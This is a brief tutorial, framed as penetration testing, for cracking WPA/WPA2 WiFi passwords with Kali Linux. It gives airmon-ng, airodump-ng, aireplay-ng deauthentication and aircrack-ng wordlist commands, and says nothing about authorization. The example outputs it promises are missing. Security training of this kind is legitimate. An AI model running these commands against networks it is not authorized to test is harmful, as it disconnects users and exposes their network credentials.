Penetration Testing, WiFi

WPA/WPA2 WiFi PenTest with Kali Linux

Kali Linux
Start your Kali Linux virtual machine.

Wireless adapter

Plugin your wireless adapter. (see Wireless Adapters suitable for WiFi pen-test).

Disconnect from all wireless networks.

Enable monitor mode on wireless interface

List wireless interfaces supporting monitor mode


Enable monitor mode

airmon-ng start wlan0

Scan for WiFi networks

airodump-ng wlan0mon

Target Network
Spot your target network in the list and note down BSSID, Channel and ESSID.

Packet Capture

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

-c channel to listen to.
–bssid show networks, matching the given bssid.
-w the dump file prefix to use

Inject packets/Capture Handshake
Watch the airodump-ng and wait for a client to show up. Leave the airodump-ng running and open a new terminal window and execute:

aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]

-0 number of deauth’s packets to send
-a access point router’s BSSID
-c client’s mac

Within moments you should see this message appear in the airodump-ng screen:


aircrack-ng -a2 -b [router bssid] -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap

-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID
-w wordlist/passwords list

If the password is in the wordlist, then aircrack-ng will show it like this: